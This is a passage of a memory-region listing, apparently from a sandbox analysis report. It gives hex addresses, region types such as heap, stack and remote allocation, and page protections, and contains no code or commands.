page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
1CD9CF8000
|
stack
|
page read and write
|
||
|
1DCADB28000
|
heap
|
page read and write
|
||
|
2AA5000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
1DCC7CF3000
|
heap
|
page read and write
|
||
|
2ABE000
|
heap
|
page read and write
|
||
|
226BE000
|
stack
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
1DCAF99B000
|
heap
|
page read and write
|
||
|
28EF000
|
stack
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
461F000
|
unkown
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
27DC000
|
stack
|
page read and write
|
||
|
474C000
|
heap
|
page read and write
|
||
|
31F9000
|
trusted library allocation
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
1DCB1A95000
|
trusted library allocation
|
page read and write
|
||
|
7180000
|
direct allocation
|
page read and write
|
||
|
4A80000
|
heap
|
page readonly
|
||
|
4741000
|
heap
|
page read and write
|
||
|
1DCAD8E0000
|
heap
|
page read and write
|
||
|
22200000
|
direct allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
2A17000
|
stack
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
763D000
|
heap
|
page read and write
|
||
|
4D48000
|
heap
|
page read and write
|
||
|
88CC000
|
stack
|
page read and write
|
||
|
21A60000
|
direct allocation
|
page read and write
|
||
|
21EAE000
|
stack
|
page read and write
|
||
|
4B69000
|
heap
|
page read and write
|
||
|
1DCAD9C0000
|
heap
|
page read and write
|
||
|
474C000
|
heap
|
page read and write
|
||
|
2B35000
|
stack
|
page read and write
|
||
|
7160000
|
direct allocation
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
4750000
|
heap
|
page read and write
|
||
|
754E000
|
stack
|
page read and write
|
||
|
B28F000
|
direct allocation
|
page execute and read and write
|
||
|
1DCADC10000
|
trusted library allocation
|
page read and write
|
||
|
4756000
|
heap
|
page read and write
|
||
|
475C000
|
heap
|
page read and write
|
||
|
22991000
|
heap
|
page read and write
|
||
|
1DCB18A3000
|
trusted library allocation
|
page read and write
|
||
|
21A90000
|
direct allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
31E4000
|
trusted library allocation
|
page read and write
|
||
|
711D000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1CD9F3E000
|
stack
|
page read and write
|
||
|
4A98000
|
trusted library allocation
|
page read and write
|
||
|
4F4F000
|
heap
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
8603000
|
heap
|
page read and write
|
||
|
6B84000
|
heap
|
page read and write
|
||
|
2227E000
|
stack
|
page read and write
|
||
|
22A24000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
2962000
|
heap
|
page read and write
|
||
|
75CE000
|
stack
|
page read and write
|
||
|
8A90000
|
trusted library allocation
|
page read and write
|
||
|
21AB0000
|
direct allocation
|
page read and write
|
||
|
15D000
|
stack
|
page read and write
|
||
|
43E000
|
stack
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
4778000
|
heap
|
page read and write
|
||
|
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
|
2D77000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
5259000
|
trusted library allocation
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
8607000
|
heap
|
page read and write
|
||
|
22B09000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
22A15000
|
heap
|
page read and write
|
||
|
1DCADA75000
|
heap
|
page read and write
|
||
|
47A4000
|
heap
|
page read and write
|
||
|
77F8000
|
trusted library allocation
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
1DCC7BB0000
|
heap
|
page execute and read and write
|
||
|
2E23000
|
heap
|
page read and write
|
||
|
31C0000
|
trusted library section
|
page read and write
|
||
|
4D49000
|
heap
|
page read and write
|
||
|
1DCC7DCF000
|
heap
|
page read and write
|
||
|
1DCB19B2000
|
trusted library allocation
|
page read and write
|
||
|
1DCC7D36000
|
heap
|
page read and write
|
||
|
2D9B000
|
stack
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2247C000
|
stack
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
89B7000
|
trusted library allocation
|
page read and write
|
||
|
4781000
|
heap
|
page read and write
|
||
|
1CD98FD000
|
stack
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
|
5581000
|
trusted library allocation
|
page read and write
|
||
|
477E000
|
heap
|
page read and write
|
||
|
476B000
|
heap
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
22A08000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
2FD9000
|
heap
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7663000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
6B8D000
|
heap
|
page read and write
|
||
|
31ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
3208000
|
heap
|
page read and write
|
||
|
4756000
|
heap
|
page read and write
|
||
|
4911000
|
heap
|
page read and write
|
||
|
8B40000
|
direct allocation
|
page read and write
|
||
|
2263F000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
8B30000
|
direct allocation
|
page read and write
|
||
|
1DCB06E7000
|
trusted library allocation
|
page read and write
|
||
|
2965000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
6B8D000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
3222000
|
trusted library allocation
|
page read and write
|
||
|
1CDAB8F000
|
stack
|
page read and write
|
||
|
1DCC7DAD000
|
heap
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
1CD9C7C000
|
stack
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
81C0000
|
heap
|
page read and write
|
||
|
8A70000
|
trusted library allocation
|
page read and write
|
||
|
22A91000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
21A80000
|
direct allocation
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
4785000
|
heap
|
page read and write
|
||
|
6B8D000
|
heap
|
page read and write
|
||
|
3225000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BBF000
|
unkown
|
page read and write
|
||
|
4B2E000
|
stack
|
page read and write
|
||
|
479D000
|
heap
|
page read and write
|
||
|
479D000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
4D5F000
|
remote allocation
|
page execute and read and write
|
||
|
22C98000
|
heap
|
page read and write
|
||
|
4756000
|
heap
|
page read and write
|
||
|
1DCAFB7D000
|
trusted library allocation
|
page read and write
|
||
|
4756000
|
heap
|
page read and write
|
||
|
7FF848FF5000
|
trusted library allocation
|
page read and write
|
||
|
477C000
|
heap
|
page read and write
|
||
|
1DCC7DE5000
|
heap
|
page read and write
|
||
|
764E000
|
heap
|
page read and write
|
||
|
44D8000
|
heap
|
page read and write
|
||
|
2DD9000
|
stack
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
7810000
|
heap
|
page execute and read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
2A7E000
|
unkown
|
page read and write
|
||
|
4ECF000
|
stack
|
page read and write
|
||
|
22D60000
|
heap
|
page read and write
|
||
|
789E000
|
stack
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
1DCC7CDC000
|
heap
|
page read and write
|
||
|
4799000
|
heap
|
page read and write
|
||
|
75F0000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
1DCC7CC0000
|
heap
|
page read and write
|
||
|
23206000
|
unclassified section
|
page execute and read and write
|
||
|
21EF0000
|
heap
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
2C3A000
|
heap
|
page read and write
|
||
|
1DCB1891000
|
trusted library allocation
|
page read and write
|
||
|
476A000
|
heap
|
page read and write
|
||
|
2E2D000
|
heap
|
page read and write
|
||
|
494F000
|
unkown
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
725A000
|
stack
|
page read and write
|
||
|
575F000
|
remote allocation
|
page execute and read and write
|
||
|
4750000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
2D7E000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
1DCC7D42000
|
heap
|
page read and write
|
||
|
11D000
|
stack
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page read and write
|
||
|
52BC000
|
heap
|
page read and write
|
||
|
2AA5000
|
heap
|
page read and write
|
||
|
21AD0000
|
direct allocation
|
page read and write
|
||
|
1DCC7D83000
|
heap
|
page read and write
|
||
|
A88F000
|
direct allocation
|
page execute and read and write
|
||
|
228F6000
|
direct allocation
|
page execute and read and write
|
||
|
78DE000
|
stack
|
page read and write
|
||
|
4762000
|
heap
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page execute and read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
1DCB0709000
|
trusted library allocation
|
page read and write
|
||
|
4754000
|
heap
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
1CDAC8B000
|
stack
|
page read and write
|
||
|
22D31000
|
heap
|
page read and write
|
||
|
4762000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
761A000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
474C000
|
heap
|
page read and write
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
6AA0000
|
heap
|
page read and write
|
||
|
476E000
|
heap
|
page read and write
|
||
|
518D000
|
heap
|
page read and write
|
||
|
5071000
|
heap
|
page read and write
|
||
|
6B41000
|
heap
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page read and write
|
||
|
1DCB18B0000
|
trusted library allocation
|
page read and write
|
||
|
4762000
|
heap
|
page read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
219E0000
|
direct allocation
|
page read and write
|
||
|
2AFC000
|
stack
|
page read and write
|
||
|
4762000
|
heap
|
page read and write
|
||
|
4D40000
|
trusted library allocation
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
22A14000
|
heap
|
page read and write
|
||
|
4753000
|
heap
|
page read and write
|
||
|
2E2C000
|
heap
|
page read and write
|
||
|
2AA5000
|
heap
|
page read and write
|
||
|
6AF0000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
1DCB101A000
|
trusted library allocation
|
page read and write
|
||
|
519A000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
846E000
|
stack
|
page read and write
|
||
|
8B50000
|
direct allocation
|
page read and write
|
||
|
2E6E000
|
unkown
|
page read and write
|
||
|
68D0000
|
heap
|
page read and write
|
||
|
4DB3000
|
heap
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
2ABC000
|
heap
|
page read and write
|
||
|
1EE000
|
unkown
|
page read and write
|
||
|
5523000
|
trusted library allocation
|
page read and write
|
||
|
4756000
|
heap
|
page read and write
|
||
|
4753000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
23189000
|
unclassified section
|
page execute and read and write
|
||
|
474C000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
4768000
|
heap
|
page read and write
|
||
|
2D7A000
|
heap
|
page read and write
|
||
|
1DCB18C6000
|
trusted library allocation
|
page read and write
|
||
|
6B37000
|
heap
|
page read and write
|
||
|
2211E000
|
stack
|
page read and write
|
||
|
5084000
|
heap
|
page read and write
|
||
|
84B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
896E000
|
stack
|
page read and write
|
||
|
22B83000
|
heap
|
page read and write
|
||
|
83E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
2D77000
|
heap
|
page read and write
|
||
|
1DCBFAFF000
|
trusted library allocation
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
76C3000
|
heap
|
page read and write
|
||
|
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
|
89B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DCC7AF0000
|
heap
|
page execute and read and write
|
||
|
21E30000
|
heap
|
page read and write
|
||
|
2AB3000
|
heap
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
2BB0000
|
heap
|
page readonly
|
||
|
5562000
|
trusted library allocation
|
page read and write
|
||
|
2D7B000
|
heap
|
page read and write
|
||
|
8875000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
trusted library allocation
|
page read and write
|
||
|
1DCBFB11000
|
trusted library allocation
|
page read and write
|
||
|
4B6A000
|
heap
|
page read and write
|
||
|
4B66000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
22A91000
|
heap
|
page read and write
|
||
|
21A50000
|
direct allocation
|
page read and write
|
||
|
7FC00000
|
trusted library allocation
|
page execute and read and write
|
||
|
223B0000
|
remote allocation
|
page read and write
|
||
|
6B89000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
7085000
|
heap
|
page execute and read and write
|
||
|
1CDAD0B000
|
stack
|
page read and write
|
||
|
8ADE000
|
stack
|
page read and write
|
||
|
219C0000
|
direct allocation
|
page read and write
|
||
|
76B9000
|
heap
|
page read and write
|
||
|
85D1000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
8B1C000
|
stack
|
page read and write
|
||
|
4F45000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
4911000
|
heap
|
page read and write
|
||
|
84C0000
|
heap
|
page read and write
|
||
|
1DCB188C000
|
trusted library allocation
|
page read and write
|
||
|
68E0000
|
direct allocation
|
page read and write
|
||
|
4B0F000
|
stack
|
page read and write
|
||
|
223EE000
|
stack
|
page read and write
|
||
|
6B33000
|
heap
|
page read and write
|
||
|
6B76000
|
heap
|
page read and write
|
||
|
1CDA13B000
|
stack
|
page read and write
|
||
|
22A08000
|
heap
|
page read and write
|
||
|
83D7000
|
stack
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
6B88000
|
heap
|
page read and write
|
||
|
435F000
|
remote allocation
|
page execute and read and write
|
||
|
6B91000
|
heap
|
page read and write
|
||
|
4751000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
4751000
|
heap
|
page read and write
|
||
|
1DCADC00000
|
heap
|
page readonly
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
8613000
|
heap
|
page read and write
|
||
|
4785000
|
heap
|
page read and write
|
||
|
21A40000
|
direct allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
1CD9B7E000
|
stack
|
page read and write
|
||
|
21A20000
|
direct allocation
|
page read and write
|
||
|
2A2F000
|
stack
|
page read and write
|
||
|
1DCAF480000
|
trusted library allocation
|
page read and write
|
||
|
21AA0000
|
direct allocation
|
page read and write
|
||
|
55A1000
|
trusted library allocation
|
page read and write
|
||
|
8A3C000
|
stack
|
page read and write
|
||
|
6B7A000
|
heap
|
page read and write
|
||
|
1DCADAF0000
|
heap
|
page read and write
|
||
|
2AA5000
|
heap
|
page read and write
|
||
|
4DCE000
|
stack
|
page read and write
|
||
|
4AEC000
|
stack
|
page read and write
|
||
|
21AC0000
|
direct allocation
|
page read and write
|
||
|
4751000
|
heap
|
page read and write
|
||
|
1CD9D3E000
|
stack
|
page read and write
|
||
|
22BFC000
|
heap
|
page read and write
|
||
|
4754000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
55FF000
|
trusted library allocation
|
page read and write
|
||
|
84AE000
|
stack
|
page read and write
|
||
|
1DCAD9E0000
|
heap
|
page read and write
|
||
|
474C000
|
heap
|
page read and write
|
||
|
1DCAF950000
|
heap
|
page read and write
|
||
|
22D30000
|
heap
|
page read and write
|
||
|
1DCADB13000
|
heap
|
page read and write
|
||
|
289A000
|
stack
|
page read and write
|
||
|
4BF1000
|
trusted library allocation
|
page read and write
|
||
|
85F1000
|
heap
|
page read and write
|
||
|
4751000
|
heap
|
page read and write
|
||
|
2D5E000
|
stack
|
page read and write
|
||
|
1CD99FD000
|
stack
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
60E000
|
stack
|
page read and write
|
||
|
4750000
|
heap
|
page read and write
|
||
|
93A0000
|
direct allocation
|
page execute and read and write
|
||
|
4D48000
|
trusted library allocation
|
page read and write
|
||
|
1DCADBF0000
|
trusted library allocation
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
1CD9A7E000
|
stack
|
page read and write
|
||
|
791D000
|
stack
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
1DCADA6D000
|
heap
|
page read and write
|
||
|
228CB000
|
unclassified section
|
page execute and read and write
|
||
|
89AE000
|
stack
|
page read and write
|
||
|
8A60000
|
trusted library allocation
|
page read and write
|
||
|
1DCC7BE3000
|
heap
|
page read and write
|
||
|
223B0000
|
remote allocation
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C01000
|
trusted library allocation
|
page read and write
|
||
|
1DCAFF8F000
|
trusted library allocation
|
page read and write
|
||
|
55C0000
|
trusted library allocation
|
page read and write
|
||
|
31E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D7A000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
7170000
|
direct allocation
|
page read and write
|
||
|
1CD9BFF000
|
stack
|
page read and write
|
||
|
2964000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
4751000
|
heap
|
page read and write
|
||
|
1DCAFF73000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DCADA60000
|
heap
|
page read and write
|
||
|
22210000
|
direct allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
316E000
|
stack
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
477D000
|
heap
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
1DCAFAF1000
|
trusted library allocation
|
page read and write
|
||
|
4753000
|
heap
|
page read and write
|
||
|
2A1C000
|
stack
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
2242F000
|
stack
|
page read and write
|
||
|
29D0000
|
heap
|
page readonly
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
2E48000
|
heap
|
page read and write
|
||
|
2BF9000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1DCADBC0000
|
trusted library allocation
|
page read and write
|
||
|
1CDA03E000
|
stack
|
page read and write
|
||
|
6B8B000
|
heap
|
page read and write
|
||
|
231B0000
|
unclassified section
|
page execute and read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
22A09000
|
heap
|
page read and write
|
||
|
22D90000
|
heap
|
page read and write
|
||
|
1DCAFF8B000
|
trusted library allocation
|
page read and write
|
||
|
1DCBFAF1000
|
trusted library allocation
|
page read and write
|
||
|
89FD000
|
stack
|
page read and write
|
||
|
6B76000
|
heap
|
page read and write
|
||
|
4910000
|
heap
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
4762000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A10000
|
direct allocation
|
page read and write
|
||
|
706E000
|
stack
|
page read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
2B1A000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
2E2C000
|
heap
|
page read and write
|
||
|
1DCC7DD6000
|
heap
|
page read and write
|
||
|
6B91000
|
heap
|
page read and write
|
||
|
4753000
|
heap
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
52AD000
|
heap
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
721D000
|
stack
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
615F000
|
remote allocation
|
page execute and read and write
|
||
|
4755000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
6B41000
|
heap
|
page read and write
|
||
|
6900000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
4D49000
|
heap
|
page read and write
|
||
|
6B8B000
|
heap
|
page read and write
|
||
|
228E0000
|
direct allocation
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
2C5F000
|
heap
|
page read and write
|
||
|
4765000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
6B3E000
|
heap
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
|
285C000
|
stack
|
page read and write
|
||
|
2ABE000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
1DCB0161000
|
trusted library allocation
|
page read and write
|
||
|
1DCAF450000
|
trusted library allocation
|
page read and write
|
||
|
2267D000
|
stack
|
page read and write
|
||
|
21A00000
|
direct allocation
|
page read and write
|
||
|
1DCADC45000
|
heap
|
page read and write
|
||
|
6AAA000
|
heap
|
page read and write
|
||
|
1DCAF600000
|
heap
|
page read and write
|
||
|
1DCC7BC0000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
7701000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
715B000
|
stack
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
68F0000
|
direct allocation
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
8590000
|
heap
|
page read and write
|
||
|
1DCADB15000
|
heap
|
page read and write
|
||
|
294B000
|
heap
|
page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
475C000
|
heap
|
page read and write
|
||
|
22230000
|
direct allocation
|
page read and write
|
||
|
6B8A000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
228B0000
|
unclassified section
|
page execute and read and write
|
||
|
76D3000
|
heap
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
476B000
|
heap
|
page read and write
|
||
|
47F000
|
stack
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
225FC000
|
stack
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
321A000
|
trusted library allocation
|
page execute and read and write
|
||
|
4785000
|
heap
|
page read and write
|
||
|
6B7A000
|
heap
|
page read and write
|
||
|
4785000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
1DCADB0E000
|
heap
|
page read and write
|
||
|
7FF848FF7000
|
trusted library allocation
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
7617000
|
heap
|
page read and write
|
||
|
231A3000
|
unclassified section
|
page execute and read and write
|
||
|
31E0000
|
trusted library allocation
|
page read and write
|
||
|
67A0000
|
heap
|
page read and write
|
||
|
2283D000
|
stack
|
page read and write
|
||
|
477F000
|
heap
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
4783000
|
heap
|
page read and write
|
||
|
1DCC7D87000
|
heap
|
page read and write
|
||
|
4720000
|
heap
|
page read and write
|
||
|
22A24000
|
heap
|
page read and write
|
||
|
4DB3000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page execute and read and write
|
||
|
22A90000
|
heap
|
page read and write
|
||
|
7DF4704E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
6F6F000
|
stack
|
page read and write
|
||
|
1DCBFDD8000
|
trusted library allocation
|
page read and write
|
||
|
5BF1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
1CDAC0D000
|
stack
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
6B76000
|
heap
|
page read and write
|
||
|
1DCB18B4000
|
trusted library allocation
|
page read and write
|
||
|
6906000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
2AA5000
|
heap
|
page read and write
|
||
|
8A50000
|
trusted library allocation
|
page read and write
|
||
|
219F0000
|
direct allocation
|
page read and write
|
||
|
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
1DCBFDE6000
|
trusted library allocation
|
page read and write
|
||
|
21A70000
|
direct allocation
|
page read and write
|
||
|
2320C000
|
unclassified section
|
page execute and read and write
|
||
|
4750000
|
heap
|
page read and write
|
||
|
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
2BBC000
|
stack
|
page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
479D000
|
heap
|
page read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
2FDF000
|
heap
|
page read and write
|
||
|
219D0000
|
direct allocation
|
page read and write
|
||
|
1CD9DB7000
|
stack
|
page read and write
|
||
|
475C000
|
heap
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
1DCC7D3E000
|
heap
|
page read and write
|
||
|
1DCC7D46000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
4756000
|
heap
|
page read and write
|
||
|
2AA4000
|
heap
|
page read and write
|
||
|
2F2B000
|
heap
|
page read and write
|
||
|
475C000
|
heap
|
page read and write
|
||
|
2BFD000
|
stack
|
page read and write
|
||
|
1DCAF9DC000
|
heap
|
page read and write
|
||
|
474C000
|
heap
|
page read and write
|
||
|
2287E000
|
stack
|
page read and write
|
||
|
7080000
|
heap
|
page execute and read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
5C19000
|
trusted library allocation
|
page read and write
|
||
|
477C000
|
heap
|
page read and write
|
||
|
22A41000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page readonly
|
||
|
2257B000
|
stack
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
6B8D000
|
heap
|
page read and write
|
||
|
479D000
|
heap
|
page read and write
|
||
|
1CD9FBE000
|
stack
|
page read and write
|
||
|
4758000
|
heap
|
page read and write
|
||
|
1CD9E37000
|
stack
|
page read and write
|
||
|
507C000
|
heap
|
page read and write
|
||
|
4B60000
|
